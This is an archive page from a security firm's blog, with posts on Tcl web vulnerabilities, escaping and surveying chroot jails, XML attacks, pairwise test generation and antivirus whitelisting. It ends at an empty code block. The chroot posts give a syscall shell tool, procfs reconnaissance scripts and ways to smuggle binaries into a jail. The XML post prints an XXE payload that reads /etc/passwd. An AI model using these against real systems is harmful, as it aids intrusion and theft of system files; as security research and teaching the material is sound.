=3.Mar.2011= [Thu] at [23:12] · Filed under 0day, Author: Derek Callaway, cansecwest, Digital Security, Exploits, fuzz testing, Software Assurance ·Tagged academic, analysis, application, assurance, blog, cansecwest, cgi, cloud, command, computing, development, exploitation, exploits, free, http, issues, language, license, network, newsgroup, objectives, private, problems, programming, protocol, public, regfuzz, research, scientific, security, software, solution, staff, tcl, testing, theory, tickling, tk, tool, toolkit, total, usenet, vancouver, vulnerabilities, web, whitepaper

Tcl/Tk
Ah, Tcl, the Tool Command Language. Based on the research conducted by myself and my colleagues here at Security Objectives (most notably Shane Macaulay), we have concluded that Tcl has a multitude of security issues, especially when used in a network environment; and these days, network usage is almost unavoidable. In essence, we urge extreme caution in Tcl-based web development, whether Tcl is being used directly or indirectly. More generally, we also advise against using Tcl for any network application or protocol (not just HTTP). Security Objectives has published an in-depth analysis of practical Tcl vulnerabilities. The whitepaper, entitled “Tickling CGI Problems”, outlines the theoretical backbone of the phenomena in its first half and presents cases of real-world exploitation in its second half. The background theory, along with some general programming and Hypertext Transfer Protocol knowledge, is recommended in order to gain a firm understanding of the exploits themselves.
This is not to say that Tcl should never be used; as a disclaimer, we are not advocating any programming language over another. Our position is that the traditional approach to web security with Tcl has much room for improvement. Like any other programming language, it works nicely in certain areas such as academic research, scientific computing, extensions, and software testing. One project that comes to mind is regfuzz, a quite useful regular expression fuzzer written in Tcl. The distinction here is that regfuzz is not intended to be exposed to a public (or even a private) network. Surely, Safe-Tcl could successfully serve network clients in a hardened production environment, given that assessed risks were rated low enough to be acceptable. The problem is that, in the overwhelming majority of cases, that is not how Tcl is deployed in practice.
The vulnerabilities exposed by the whitepaper affect TclHttpd, Lyris List Manager, and cgi.tcl (which also uses Expect), as well as the Tcl language itself and interpreters thereof. Some of the attack methodologies and vulnerabilities identified are new to the public; others are similar to well-known attacks or are simply subversions of previous security patches, e.g. CVE-2005-4147. As time unfolds, there will surely be a surge in publicized Tcl weaknesses due to the research elaborated on within the whitepaper. If you’re interested in discovering vulnerabilities in Tcl software yourself, there’s a grand list of Tcl-related references at http://www.tcl.tk/resource_dump.html. There is also a USENET newsgroup dedicated to the language, naturally named comp.lang.tcl.
For those of you attending CanSecWest 2011 in Vancouver, we are sponsoring the event. Professionals from Security Objectives will be in attendance to answer your queries regarding Tcl/Tk security or other areas of specialized research (information assurance, software assurance, cloud security, etc.) Of course, our professionals will also be available to field questions regarding Security Objectives’ product and service offerings as well. In addition, CanSecWest 2011 attendees receive special treatment when purchasing licenses for BlockWatch, the complete solution to total cloud security.
=5.Sep.2010= [Sun] at [21:25] · Filed under Author: Derek Callaway, Digital Security, Misceallaneous, Systems Theory ·Tagged aliases, bash, binary, C, clipboard, code, commands, compile, copy, CSS, directories, distributions, EOF, extension, fileutils, font, gnu, install, Interix, Linux, loops, mainstream, misconfigured, multi-threaded, netstat, operating, parallel, parsing, Perl, perlcc, procfs, root, scripts, shell, statement, SUA, system, text, uptime, version, WordPress, xargs
It’s been a while, but that doesn’t necessarily mean it was vaporware! 😉 As promised in Part 1, the system call tool that mimics GNU fileutils commands is in the code listing below. Support for additional commands is welcome; if anybody adds more, feel free to e-mail your source code. Extension should be fairly straightforward given the “if(){} else if(){} else{}” template: simply add another else-if code block with appropriate command line argument parsing. It’s too bad you can’t really do closures in C, but a likely approach to increasing this tool’s modularity is the use of function pointers. Of course, new commands don’t have to be from GNU fileutils; mixing and matching Linux system calls in C has limitless possibilities.
Speaking of GNU, I stumbled across an extremely useful GNU project called parallel. Essentially, it’s a multi-threaded version of xargs(1p). I’ve been including it in a lot of bash scripts I’ve written recently. It doesn’t seem to be part of the default install for any operating system distributions yet; maybe when it evolves into something even more awesome it’ll become mainstream. 🙂 Surprisingly, I was even able to compile it on SUA/Interix without any problems. The only complaint I have about it is the Perl source language (not that I have anything against Perl); I simply feel that the parallelization could be that much faster if written in C. Maybe I’ll perlcc(1) it or something. Okay then, without further ado, here’s the code for syscaller:
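Since parallel isn’t installed by default anywhere yet, here’s a minimal sketch of the idea using the portable multi-process mode of xargs (its -P flag), with the GNU parallel equivalent left in a comment; the echo jobs are just placeholders:

```shell
# Run eight trivial jobs with at most four running concurrently.
# xargs -P is the portable multi-process form; the commented line
# shows the same thing with GNU parallel (if it is installed).
seq 1 8 | xargs -P4 -I{} sh -c 'echo "job {}"'
# seq 1 8 | parallel 'echo "job {}"'
```

With real workloads (gzip, scp, fuzz cases), each {} becomes one argument and one job, so otherwise-sequential shell pipelines get the benefit of every core.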
/*
* syscaller v0.8a - breaking out of chroot jails "ex nihilo"
*
* by Derek Callaway <decal@security-objectives.com>
*
*
* Executes system calls instead of relying on programs from the
* GNU/Linux binutils package. Can be useful for breaking out of
* a chroot() jail.
*
 * compile: gcc -O2 -Wall -ansi -pedantic -o syscaller syscaller.c
 * copy: cat syscaller | ssh user@host.dom 'cat > syscaller'
*
* If the cat binary isn't present in the jail, you'll have to be more
* creative and use a shell builtin like echo (i.e. not the echo binary,
* but bash's internal implementation of it.)
*
* Without any locally accessible file download programs such as:
* scp, tftp, netcat, sftp, wget, curl, rz/sz, kermit, lynx, etc.
* You'll have to create the binary on the target system manually.
* i.e. by echo'ing hexadecimal bytecode. This is left as an exercise
* to the reader.
*
*/
#define _GNU_SOURCE 1
#define _USE_MISC 1
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<ctype.h>
#include<unistd.h>
#include<sys/syscall.h>
#include<sys/types.h>
#include<pwd.h>
#include<grp.h>
/* _GNU_SOURCE must be defined before the includes so that <unistd.h>
 * declares syscall(2); its prototype is: long syscall(long number, ...); */
/* This is for chdir() */
#define SHELL_PATHNAME "/bin/sh"
static void usage(char **argv)
{
printf("usage: %s syscall arg1 [arg2 [...]]\n", *argv);
printf("help: %s help\n", *argv);
exit(EXIT_FAILURE);
}
static void help(char **argv)
{
puts("syscaller v0.8a");
puts("=-=-=-=-=-=-=-=");
puts("");
puts("SYSCALLER COMMANDS");
puts("");
puts("chmod mode pathname");
puts("chdir pathname");
puts("chown user group pathname");
puts("mkdir pathname mode");
puts("rmdir pathname");
puts("touch pathname mode");
puts("");
puts("Note: modes are in octal format (symbolic modes are unsupported)");
puts("Note: some commands mask octal mode bits with the current umask value");
puts("Note: creat is an alias for touch");
puts("");
puts("USEFUL SHELL BUILTINS");
puts("");
puts("ls -a / (via brace/pathname expansion): echo /{.*,*}");
exit(EXIT_SUCCESS);
}
int main(int argc, char *argv[])
{
register char *p = 0;
signed auto int r = 1;
if(argc < 2)
usage(argv);
/* I prefer to avoid strcasecmp() since it's not really standard C. */
for(p = argv[1];*p;++p)
*p = tolower(*p);
do
{
if(!strcmp(argv[1], "chmod") && argc >= 4)
{
/* parse the mode argument as an octal string */
const mode_t m = strtol(argv[2], NULL, 8);
r = syscall(SYS_chmod, argv[3], m);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %s, %d) => %d\n", SYS_chmod, argv[3], m, r);
#endif
}
else if((!strcmp(argv[1], "chdir") || !strcmp(argv[1], "cd")) && argc >= 3)
{
static char *const av[] = {SHELL_PATHNAME, NULL};
auto signed int r2 = 0;
r = syscall(SYS_chdir, argv[2]);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %s) => %d\n", SYS_chdir, argv[2], r);
#endif
/* This is required because the new current working directory isn't
* bound to the original login shell. */
printf("[%s] exec'ing new shell in directory: %s\n", *argv, argv[2]);
r2 = system(av[0]);
printf("[%s] leaving shell in child process\n", *argv);
if(r2 < 0)
r = r2;
}
else if(!strcmp(argv[1], "chown") && argc >= 5)
{
struct passwd *u = NULL;
struct group *g = NULL;
if(!(u = getpwnam(argv[2])))
break;
#ifdef DEBUG
fprintf(stderr, "getpwnam(%s) => %s:%s:%d:%d:%s:%s:%s\n", argv[2], u->pw_name, u->pw_passwd, u->pw_uid, u->pw_gid, u->pw_gecos, u->pw_dir, u->pw_shell);
#endif
if(!(g = getgrnam(argv[3])))
break;
#ifdef DEBUG
fprintf(stderr, "getgrnam(%s) => %s:%s:%d:", argv[3], g->gr_name, g->gr_passwd, g->gr_gid);
{
char **gp = g->gr_mem;
while(gp && *gp)
{
fputs(*gp, stderr);
gp++;
if(*gp)
fputc(',', stderr);
}
fputc('\n', stderr);
}
#endif
r = syscall(SYS_chown, argv[4], u->pw_uid, g->gr_gid);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %s, %d, %d) => %d\n", SYS_chown, argv[4], u->pw_uid, g->gr_gid, r);
#endif
}
else if((!strcmp(argv[1], "creat") || !strcmp(argv[1], "touch")) && argc >= 4 )
{
const mode_t m = strtol(argv[3], NULL, 8);
r = syscall(SYS_creat, argv[2], m);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %s, %d) => %d\n", SYS_creat, argv[2], m, r);
#endif
}
else if(!strcmp(argv[1], "mkdir") && argc >= 4)
{
const mode_t m = strtol(argv[3], NULL, 8);
r = syscall(SYS_mkdir, argv[2], m);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %s, %d) => %d\n", SYS_mkdir, argv[2], m, r);
#endif
}
else if(!strcmp(argv[1], "rmdir") && argc >= 3)
{
r = syscall(SYS_rmdir, argv[2]);
#ifdef DEBUG
fprintf(stderr, "syscall(%d, %s) => %d\n", SYS_rmdir, argv[2], r);
#endif
}
else if(!strcmp(argv[1], "help"))
help(argv);
else
usage(argv);
break;
} while(1);
perror(argv[1]);
exit(r);
}
Please note that some lines of code in this article appear truncated due to how WordPress’s CSS renders the text; you’ll still receive every statement in its entirety when you copy it to your clipboard. The next specimen is similar to the netstat-emulating shell script from Part 1. It loops through the procfs PID directories and parses their contents so it looks like you’re running the actual /bin/ps, even though you’re inside a misconfigured root directory that lacks that binary. It also defines some useful aliases and a simple version of uptime(1).
#!/bin/bash
# ps.bash by Derek Callaway decal@security-objectives.com
# Sun Sep 5 15:37:05 EDT 2010 DC/SO
alias uname='cat /proc/version' hostname='cat /proc/sys/kernel/hostname'
alias domainname='cat /proc/sys/kernel/domainname' vim='vi'
function uptime() {
declare loadavg=$(cat /proc/loadavg | cut -d' ' -f1-3)
let uptime=$(($(awk 'BEGIN {FS="."} {print $1}' /proc/uptime) / 60 / 60 / 24 ))
echo "up $uptime day(s), load average: $loadavg"
}
function ps() {
local file base pid st ppid uid user
echo 'S USER UID PID PPID CMD'
for file in /proc/[0-9]*/status
do base=${file%/status} pid=${base#/proc/}
{ read _ st _; read _ ppid; read _ _ _ _ uid; } < <(egrep '^(State|PPid|Uid):' "$file")
IFS=':' read user _ < <(getent passwd $uid) || user=$uid
printf "%1s %-6s %5d %5d %5d %s\n" $st $user $uid $pid $ppid "$(tr '\0' ' ' <"$base/cmdline")"
done
}
#EOF#
=14.Feb.2010= [Sun] at [21:34] · Filed under Author: Derek Callaway, Digital Security, Exploits, Misceallaneous, Systems Theory ·Tagged access, account, administrators, attack, bash, binary, chmod, chown, chroot, configuration, containers, context, daemon, directory, elf, environment, escalation, filesystem, fileutils, gnu, hackers, internet, kernel, libraries, manual, memory, netstat, network, noexec, oracle, overflow, pathnames, phrack, privilege, processes, procfs, scp, script, sftp, shell, shellcode, solaris, ssh, stack, sun, tcp, twitter, udp, vulnerable, zones
The content of this blog post is intended for the hackers who have found themselves frustrated as a result of privilege escalation difficulties in the context of a chroot(2) jail environment. Such a situation can occur because of shell account access where the environment or the shell itself has been restricted, successful execution of shellcode via an overflow in the context of a network daemon, etc. Before I begin, I’d just like to mention that in newer versions of Sun Microsystems’ Solaris (now the Oracle Solaris operating system), Containers, also known as zones, serve a similar purpose to chroot prisons. Also, I won’t be discussing kernel space memory corruption as a means of subverting a jail; this subject was touched upon in a Phrack article entitled Smashing The Kernel Stack For Fun And Profit (P60-6).
First, I’d like to state that sometimes much information can be gathered simply by looking around the jailed directory hierarchy, since system administrators occasionally copy files from the real root filesystem into the jail. For example, /etc/ld.so.cache may contain pathnames to libraries that exist in the real root, allowing network daemons and other programs that are dynamically linked with vulnerable libraries to be targeted.
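As a quick sketch of that reconnaissance step, the pathnames can be pulled out of the cache file with nothing more than tr and grep (list_cached_libs is a helper name of my own; adjust the path to wherever the jail keeps its copy):

```shell
# Pull printable pathname strings out of a binary ld.so.cache copy;
# each unique path hints at libraries present in the real root filesystem.
list_cached_libs() {
  tr -c '[:graph:]' '\n' < "$1" | grep '^/' | sort -u
}
if [ -r /etc/ld.so.cache ]; then
  list_cached_libs /etc/ld.so.cache | head
fi
```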
Second, it is not entirely uncommon for procfs to be mounted at the usual /proc location within the jail, since it’s a prerequisite for many useful utilities. This allows more information to be gathered, such as network configuration settings, Internet connections, running processes, and more. For example, the information displayed by netstat(8) can be gleaned from /proc/net/tcp and /proc/net/udp even though the netstat binary may not exist in the chroot environment. The bash shell script below demonstrates this ability:
#!/bin/bash
# netstat.bash by Derek Callaway <decal@security-objectives.com>
# Sun Feb 14 15:56:26 EST 2010 DC/SO
function netstat()
{
echo 'Active Internet connections (w/o servers)'
echo -e 'Proto\tLocal Addr\t\tForeign Addr'
while read -r sl la ra st tx rx tr tm rn smt uid
do if [ $sl == 'sl' ];then continue;fi
l1=${la:0:2}&&l2=${la:2:2}&&l3=${la:4:2}&&l4=${la:6:2}&&li=${la:9:4}
r1=${ra:0:2}&&r2=${ra:2:2}&&r3=${ra:4:2}&&r4=${ra:6:2}&&ri=${ra:9:4}
fmt="tcp\t%u.%u.%u.%u:%u\t%u.%u.%u.%u:%u\n"
if [ $r1 == '00' ];then fmt="tcp\t%u.%u.%u.%u:%u\t\t%u.%u.%u.%u:%u\n";fi
printf $fmt 0x$l4 0x$l3 0x$l2 0x$l1 0x$li 0x$r4 0x$r3 0x$r2 0x$r1 0x$ri
done < /proc/net/tcp
# Replace /proc/net/tcp above with /proc/net/udp to view UDP info
}
If the chmod binary is not present in the jail, then you can still make the script usable by simply running bash script.sh, source script.sh, . script.sh, etc. These commands will work even if the /home directory is mounted with the noexec option, since bash (or whatever shell you’re using) must live in a directory on a partition that allows execution, such as /bin. Of course, you’re out of luck in that particular scenario if you want to execute an ELF binary under $HOME, although some combination of indirect attack techniques may still lead to the desired effect.
Similarly, a makeshift route(8) script can be created to display information about the IP routing table which is accessible through /proc/net/route. Lots of useful information can be gathered from procfs in this manner. Refer to the manual pages and /usr/src/linux/Documentation/filesystems/proc.txt for many more possibilities.
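A minimal sketch of such a makeshift route command is below. Note that /proc/net/route stores the destination and gateway as little-endian hexadecimal, so the bytes have to be reversed before printing (hex2ip is a helper name of my own invention, in the same bash style as the scripts above):

```shell
# Convert the little-endian hex IPv4 addresses found in /proc/net/route
# into dotted-quad notation.
function hex2ip() {
  local h=$1
  printf '%u.%u.%u.%u' 0x${h:6:2} 0x${h:4:2} 0x${h:2:2} 0x${h:0:2}
}
function route() {
  local iface dest gw rest
  echo -e 'Iface\tDestination\tGateway'
  while read -r iface dest gw rest
  do if [ "$iface" == 'Iface' ];then continue;fi
     printf '%s\t%s\t%s\n' "$iface" "$(hex2ip $dest)" "$(hex2ip $gw)"
  done < /proc/net/route
}
```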
If file transfer services such as SCP and (S)FTP are not configured for the prison, then binary files can still be copied to the target system. If SSH access is available, then cat file.bin | ssh user@host.dom 'cat > file.bin' will suffice. If SSH is not an option, then it shouldn’t be very difficult to write a script locally that converts the file contents to hexadecimal and emits the needed echo -ne '\x90'-styled commands which will construct the file auto-magically on the remote system.
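A rough sketch of that local-side conversion follows (bin2echo is a made-up name; od(1) produces the hex dump, and the output is a paste-able series of echo commands that append to out.bin on the remote end):

```shell
# Emit `echo -ne` commands that rebuild a binary file when pasted
# into a remote shell; the reconstructed copy is appended to out.bin.
# NB: verify that the remote shell's echo handles \x00 escapes for
# binaries containing NUL bytes; printf(1) is a fallback if not.
bin2echo() {
  od -An -v -tx1 "$1" | while read -r line
  do
    [ -z "$line" ] && continue
    printf "echo -ne '"
    for b in $line; do printf '\\x%s' "$b"; done
    printf "' >> out.bin\n"
  done
}
```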
In the second part of this blog duo I will provide the source code to a custom job shell that has built-in commands based on system call prototypes in order to circumvent the absence of important commands from packages like GNU fileutils, i.e. chmod(1), chown(1), and others. I’ll be demonstrating another shell script that takes advantage of procfs presence as well so check back soon for more useful tidbits. You can find notifications of new System of Systems blog postings on our Twitter feed, @secobjs.
=25.Sep.2009= [Fri] at [0:40] · Filed under Author: Derek Callaway, combinatorics, Digital Security, Discrete Mathematics, fuzz testing, Security Industry, Software Assurance, Systems Theory ·Tagged 2-exptime, active, aerospace, algorithmic, analysis, array, assurance, augment, bell, binary, binomial, blockwatch, bob, bugs, code, coefficient, complexities, concurrency, conditions, covering, curve, desktop, device, dynamic, earth, error, evaluation, factorial, feynman, functional, generator, halting, hardcore, hidden, instrumentation, inventions, issues, jenkins, jenny, linear, machine, mccarthy, molecular, nist, pairwise, pcp, perfection, polynomial, preconditions, problem, quality, quantum, race, research, samate, scientists, sequences, silicon, software, steering, stress, testing, turing, universal, vulnerabilities

binomial coefficients
..binomial coefficients?! That’s right. I’ve found the web site of a Mr. Bob Jenkins with an entire page dedicated to a pairwise covering array generator named jenny.c. I’m fairly sure that only the most hardcore of the software testing weenies have some notion of what those are, so for the sake of being succinct I’ll provide my own explanation here: a pairwise covering array generator is a program for silicon computing machines that deduces sequences of input value possibilities for the purposes of software testing. And yes, I did say silicon computers: since exhaustively testing their software runs up against the great Mr. Turing’s halting problem, the existence of a practical, affordable, and efficient nano/molecular computing device such as a DNA computer, Feynman machine, universal quantum computer, etc. would essentially predicate a swift solution to the problem of testing contemporary computer software in non-deterministic polynomial time. The only problem we would have then is how to test those fantastic, futuristic, seemingly science-fictive yet wondrous problem-solving inventions as they break through laborious barriers of algorithmic complexity that twentieth century computer scientists could have only dreamed about: PCP, #P, PSPACE-complete, 2-EXPTIME and beyond.. The stuff that dreams are made of.
Now, let’s return to Earth and learn about a few things that make Jenny so special. Computer scientists learned early on in their studies of software testing that pairwise tests, i.e. test cases with two input values, were the most likely to uncover erroneous programming or “bugs.” Forget the luxury of automation for a minute: old school programmers typed input pairs manually to test their own software. Code tested in that manner was most likely some sort of special-purpose console mode utility. (Celsius to Fahrenheit, anyone?) As the computing power of the desktop PC increased according to Moore’s law, it became time-effective to write a simple program to generate these input pairs instead of toiling over them yourself; I suppose not testing at all was another option. Even today, some software is released to market after only very minor functional and/or quality assurance testing. Regression, stress, security, and other forms of testing cost money and reduce time to market, but in reality the significant return on investment acts as a hedge against any losses incurred. Even ephemeral losses justify the absolute necessity of these expenditures.
A Jenny built in modern times undoubtedly has the power to deductively prove that a software product of the eighties is comprised of components (or units) that are fundamentally error-free. However, the paradox remains that improvements in automated software testers share a linear relationship with improvements in software in general. Thus, pairwise has become “n-way,” which describes the process of utilizing greater multiples of input values in order to cover acceptable numbers of test cases. The number of covering arrays generated in this fashion grows exponentially and can be calculated as a binomial coefficient (see the formula below).

(n choose r) in factorial terms: C(n, r) = n! / (r! * (n - r)!)
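To make that growth concrete, here’s a small bash sketch that computes the binomial coefficient via the multiplicative form of the factorial formula (the intermediate division is always exact, so plain integer arithmetic suffices; binom is my own helper name):

```shell
# binom N R: the binomial coefficient C(N, R) = N! / (R! * (N - R)!),
# i.e. the number of R-way input combinations among N test parameters.
binom() {
  local n=$1 r=$2 result=1 i
  if (( r > n - r )); then r=$(( n - r )); fi   # symmetry: C(n,r) = C(n,n-r)
  for (( i = 1; i <= r; i++ )); do
    result=$(( result * (n - i + 1) / i ))      # exact at every step
  done
  echo "$result"
}
binom 10 2   # pairwise cases among 10 parameters: 45
binom 30 6   # 6-way cases among 30 parameters: 593775
```

The jump from 45 pairs to 593,775 six-way combinations for a modest parameter count is exactly why covering array generators, rather than exhaustive enumeration, are needed at higher n.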
According to Paul Black, former SAMATE (Software Assurance Metrics and Tool Evaluation) project leader, researchers at NIST have pegged 6-way as the magic number for optimal fault interaction coverage (notably Rick Kuhn and Dolores Wallace.) This conclusion is based on hard evidence from studies on real-world software scenarios including medical devices and the aerospace industry. However, it would not surprise me to see this approximation rise significantly in the coming decades, just as the paradoxical relationship between general-purpose software and automated software testing programs shifts itself in accordance with Moore’s law. If not by Moore, then by some other axiom of metric progression such as Rogers’ bell curve of technological adoption.
I’ve also got a hunch that the tiny percentage of bugs in that “n is arbitrarily greater than 6” range includes some of the most critical, powerfully impacting software vulnerabilities known to man. They lie on an attack surface that’s almost non-existent; this makes them by definition obscure, non-obvious, shadowy, and hidden. Vulnerabilities in this category are the most important by their very nature. Therefore, detecting vulnerabilities of this type will involve people and tools that are masters of marksmanship and artistic in their innovation. Research in this area is off to a steady beginning, especially within the realms of dynamic instrumentation or binary steering, active analysis, fault propagation, higher-order preconditions/dependencies, concurrency issues, race conditions, etc. I believe that combining the merits inherent in various analysis techniques will lead to perfection in software testing.
For perfection in hashing, check out GNU’s gperf, read how Bob used a perfect hashing technique to augment Jenny’s n-tuples; then get ready for our Big ßeta release of the BlockWatch client software (just in time for the holiday season!)
=22.May.2009= [Fri] at [16:41] · Filed under Author: Derek Callaway, Misceallaneous, Windows ·Tagged ads, amaya, api, applications, atom, attribute, biztalk, brown, charlie, chromium, dereference, dime, element, encryption, engines, exefilter, exif, explorer, expressions, extensible, firefox, format, functions, good, google, grief, header, http, ie8, images, indexing, ipv6, konqueror, lagadec, libgd, libmagick, lynx, macos, markup, middleware, multipart, navigator, netmask, netscape, new york, opera, oslo, request, resource, rest, ria, rss, safari, sax, security, shellcode, signature, silverlight, smuggling, soap, standards, syndication, tcp, thumbnail, tomcat, transform, twits, uri, validation, w3m, wcf, weblogic, win32, ws-security, xaml, xerces, xml, xml-dsig, xpath

It’s been a little while since we last posted so I wanted to get a blog out there so everybody knows we’re still alive! We just finalized the XML schema for our soon to be released BlockWatch product so with all the XML tags, elements, attributes, and such running through my head I figured I’d blog about XML security. I’m sure the majority of penetration testers out there routinely test for the traditional web application vulnerabilities when looking at Web Services. The same old authentication/authorizations weaknesses, faulty encoding/reencoding/redecoding, session management issues, et al. are still all there and it’s not uncommon for a SOAP Web Service to hand off an attack string to some middleware app that forwards it on deep into the internal network for handling by the revered legacy mainframe. Some organizations process so much XML over HTTP that they place XML accelerator devices on their network perimeter. I have a feeling that this trend will increase the amount of private IP web servers that feel the effects of HTTP Request Smuggling.
Additionally, XML parsers that fetch external document references (e.g. remote URIs embedded in tag attributes) open themselves up to client-side offensives from evil web servers. Crafted file attachments can come in the form of a SOAP DIME element or the traditional multipart HTTP POST file upload. With those things in consideration, Philippe Lagadec’s ExeFilter talk from CanSecWest 2008 made some pretty good points on why verifying filename extensions and file header contents or magic numbers isn’t always good enough.
The new manifestations of these old problems should be cause for concern but I personally find the newer XML-specific bugs the most exciting. For example: XPath injection, infinitely nesting tags to cause resource exhaustion via a recursive-descent parser, XXE (XML eXternal Entity) attacks, etc.
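To make the external-entity case concrete, the snippet below writes out the classic XXE probe document; this is a sketch for authorized testing only, and target.example in the commented delivery line is a placeholder, not a real endpoint:

```shell
# Write a minimal XXE probe; a parser that resolves external entities
# will substitute the contents of /etc/passwd wherever &xxe; appears.
cat > xxe.xml <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo>
EOF
# Hypothetical delivery to a SOAP endpoint (placeholder URL):
# curl -s -H 'Content-Type: text/xml' --data @xxe.xml http://target.example/ws
```

The same DOCTYPE mechanism drives the resource-exhaustion variant: nested entity definitions that expand geometrically when the parser resolves them.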
A single file format for everything is supposed to make things more simple but the lion’s share of real-world implementations over-complicate the fleeting markup language tags to the point where they become a breeding ground for old school exploits and new attack techniques alike–we’re all familiar with the cliche regarding failure of a “system of systems” with too many moving parts. I’ll touch on some more advanced XML attacks later in the post, but first let’s take a step back and remember XML when it still had a fresh beginning.
Towards the end of the twentieth century, when I first started taking notice of all the hype surrounding XML (the eXtensible Markup Language), I held a fairly skeptical attitude towards it, as I tend to do with many fledgling technologies/standards. Perhaps I’ve been over-analytical in that respect, but look how long it’s taken IPv6 to amass even a minuscule amount of usage! Admittedly, a formal data representation grammar certainly was needed in that “dot-bomb” era, a time when mash-up web applications were near impossible to maintain since consistently pattern matching off-site content demanded continuous tweaking of regular expressions, parsers, etc. The so-called browser war of Netscape Navigator vs. Internet Explorer couldn’t have helped things either. If that was a war, then we must be on the brink of browser Armageddon now that there’s Chromium, Firefox 3, IE8 RTM, Safari 4 Beta, Opera, Konqueror, Amaya, w3m, lynx, etc. The good news? We now have Safari for Win32. The bad news? Microsoft no longer supports IE for MacOS..bummer.
I think it’s fairly rational to forecast continued adoption of XML Encryption and WS-* standards for SOAP Web Services that handle business-to-business and other communications protocol vectors. If you’re bored of the same old Tomcat/Xerces, WebLogic/SAX, etc. deployments, then prepare for applications written with newer APIs to arrive soon; namely Microsoft WCF and Oslo, the Windows Communication Foundation API and a modeling platform with design tools (respectively). From the surface of .NET promotional hype, it appears as if WCF and Oslo will be synthesized into a suite reminiscent of BizTalk Server’s visual process modeling approach. WCF has commissioned many Web Services standards including WS-Security, but of course not all major software vendors are participating in all of the standards. The crew in Redmond have committed to REST in WCF, and it wouldn’t surprise me to see innovative XML communications techniques arising from the combination of Silverlight 3 and .NET RIA Services; for those of you who still don’t know, RIA is an acronym for Rich Internet Applications! Microsoft is leveraging the interoperability of this extensible markup language for the long-proprietary document formats of their Office product suite as part of their Open Specification Promise. Even the Microsoft Interactive Canvas, essentially a table that provides I/O through touch, uses a form of XML (XAML) for markup.
Blogosphereans, Security Twits, and other Netizens alike seem to take this Really Simple Syndication thing for granted. Over the past several years or so there’s been a trend of malicious payloads piggybacking on banner ads. Since RSS and Atom are capable of syndicating images as well, I’d like to see a case study detailing the impact of a shellcode-toting image referenced from within an XML-based syndication format. Obvious client-side effects that occur when the end user’s browser renders the image are to be expected (gdiplus.dll, anyone?) What else could be done? Web 2.0 search engines with blog and image search features often pre-process those images into a thumbnail as a part of the indexing process. A little recon might discover the use of libMagick by one and libgd by another. Targeting one specific spiderbot over another could be done by testing the netmask of the source IP address making the TCP connection to the web server or probably even as simple as inspecting the User Agent field in the HTTP request header. Crafting a payload that functions both before and after image resizing or other additional processing (ex. EXIF meta-data removal) would be quite an admirable feat. Notwithstanding, I was quite surprised how much Referer traffic our blog got from images.google.com after Shane included a picture of the great Charlie Brown in his “Good Grief!” post…but I digress.
Several years ago, when I was still living in New York, I became fascinated with the subtle intricacies of XML-DSig while studying some WS-Security literature. XML Signature Validation in particular had attracted my attention in earnest. In addition to the characteristics of traditional digital signatures, XML Signatures exhibit additional idiosyncrasies that require a bit of pragmatism to be implemented properly, and therefore to be verified properly as well (e.g. by a network security analyst). This is mainly because of the Transform and Reference elements nested within the Signature elements; References and Transforms govern the data to be provided as input to the DigestMethod, which produces the cryptic DigestValue string. A Reference element contains a URI attribute which represents the location of the data to be signed. Depending on the type of Transform element, data first dereferenced from the Reference URI is then transformed (i.e. via an XPath query) prior to signature calculation. That’s essentially how it works. Something that may seem awkward is that the XML being signed can remain exactly the same while the digital signature (e.g. the DigestValue element value) changes. I’ve decided to leave some strange conditions that often come about as an exercise for the reader:
What happens to an XML Digital Signature if … ?
- No resource exists at the location referenced by the Reference element’s URI attribute value.
- A circular reference is formed because a URI attribute value points to another Reference element whose URI attribute value is identical to the first.
- The URI identifies the Signature element itself.
- A resource exists at the URI, but it’s empty.
- The Reference element has a URI attribute value which is an empty string, <Reference URI="">
=11.Feb.2009= [Wed] at [7:05] · Filed under Author: Derek Callaway, Digital Security, Philosophy, Security Industry, Software Assurance, Systems Theory ·Tagged anti-virus, antithesis, autoimmune, biological, blacklist, cansecwest, clone, cloud, digital, ethics, evolution, geopolitical, hash, hegelian, hybrid, malware, management, md5deep, mutation, nsrl, occam, pass, Philosophy, security, signature, sourceboston, synthesis, thesis, vaccine, virii, whitelist
Usually it’s difficult for me to make a correlation between the two primary subjects that I studied in college–computer science and philosophy. The first few things that pop into mind when attempting to relate the two are typically artificial intelligence and ethics. Lately, intuition has caused me to ponder over a direct link between modern philosophy and effective digital security.
More precisely, I’ve been applying the Hegelian dialectic to the contemporary signature-based approach to anti-virus while pontificating with my peers on the immediate results; the extended repercussions of this application are even more fascinating. Some of my thoughts on this subject were inspired by assertions of Andrew Jacquith and Dr. Daniel Geer at the Source Boston 2008 security conference. Dr. Geer painted a beautiful analogy between the direction of digital security systems and the natural evolution of biological autoimmune systems during his keynote speech, and Mr. Jacquith outlined the functional downfalls of the current major anti-virus offerings. These two notions became the catalysts for the theoretical reasoning and practical applications I’m about to describe.
Hegel’s dialectic is an explicit formulation of a pattern that tends to occur in progressive ideas. Now bear with me here: in essence, it states that for a given action, an inverse reaction will occur, and subsequently the favorable traits of both the action and reaction will be combined; then the process starts over. A shorter way to put it is: thesis, antithesis, synthesis. Note that an antithesis can follow a synthesis, and this is what creates the loop. This dialectic is a logical characterization of why great artists are eventually considered revolutionary despite initial ridicule for rebelling against the norm. When this dialectic is applied to anti-virus, we have: blacklist, whitelist, hybrid mixed-mode. Anti-virus signature databases are a form of blacklisting. Projects such as AFOSI md5deep, the NIST NSRL, and Security Objectives’ Pass The Hash are all whitelisting technologies.
A successful hybrid application of these remains to be seen since the antithesis (whitelisting) is still a relatively new security technology that isn’t utilized as often as it should be. A black/white-list combo that utilizes chunking for both is the next logical step for future security software. When I say hybrid mixed-mode, I don’t mean running a whitelisting anti-malware tool and traditional anti-virus in tandem although that is an attractive option. A true synthesis would involve an entirely new solution that inherited the best of each parent approach, similar to a mule’s strength and size. The drawbacks of blacklists and whitelists are insecurity and inconvenience, respectively. These and other disadvantages are destined for mitigation with a hybridizing synthesis.
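As a rough illustration of what such a hybrid might look like, here is a minimal Python sketch. The chunk size and the use of SHA-256 are my own assumptions for the example, not a description of any shipping product: each fixed-size chunk is hashed and checked against a blacklist first, then a whitelist, and anything matching neither is flagged as unknown.

```python
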